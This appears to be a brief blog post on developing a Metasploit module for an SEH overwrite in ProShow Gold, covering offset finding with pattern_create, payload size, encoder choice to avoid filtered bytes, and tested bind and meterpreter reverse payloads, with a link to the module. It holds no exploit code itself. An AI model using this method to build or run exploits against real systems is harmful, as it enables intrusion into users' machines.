Recently I decided to take a look at a vulnerability in ProShow Gold reported by BKIS and detailed in OSVDB 57226.  Much of the hard work was done, as BKIS had released a PoC pointing out the trigger location.  I quickly found that the way to make this bug work easily was to exploit it using the SEH technique.

I used Metasploit’s ./pattern_create.rb to get the offset to the first handler in the chain.  Typing ./pattern_create.rb 6500, felt a little weird, but sometimes you just have to overwrite a lot of stuff.  I then used ./pattern_create.rb again to get the max payload size, past the handler.  In the module this is listed as 1000 bytes, but you could actually squeeze a few more (if you’re into writing exceptionally large custom shellcode).

A few failed payloads, looking at what was delivered vs. what was sent, you realize that there are quite a few bytes getting filtered.  So, we set the encoder to x86/alpha_mixed.  This takes care of our payload issues for the most part.

Overall bug was a great example of a very straightforward SEH overwrite.

Tested port bind and meterpreter reverse connect payloads without issue.  Enjoy.

Direct Link to proshow_psh.rb

Code, Exploitation 0day, exploit, metasploit